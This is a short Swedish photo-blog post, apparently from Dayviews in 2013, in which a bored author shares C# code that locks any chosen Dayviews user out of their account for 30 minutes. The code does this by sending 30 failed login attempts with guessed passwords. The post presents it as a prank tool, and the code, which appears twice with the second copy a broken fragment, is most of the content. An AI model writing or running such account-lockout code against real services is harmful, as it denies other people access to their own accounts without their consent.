Tuesday 22 October 2013 photo 1/1
|
Hade riktigt tråkigt, så jag skrev ett program som blockerar dayviews användare från att logga in på 30min. Tog runt 1min att skriva programmet, så vet inte riktigt vad jag ska göra nu..
//Här har ni koden iaf-
private void button1_Click(object sender, EventArgs e)
{
int x = 1;
int y = 31;
WebClient wb = new WebClient();
while (x != y)
{
string html = wb.DownloadString("http://dayviews.com/?&action=login&user=" + textBox1.Text + "&pass=" + x.ToString() + "&json=1");
x++;
}
}
{
int x = 1;
int y = 31;
WebClient wb = new WebClient();
while (x != y)
{
string html = wb.DownloadString("http://dayviews.com/?&action=login&user=" + textBox1.Text + "&pass=" + x.ToString() + "&json=1");
x++;
}
}
Annons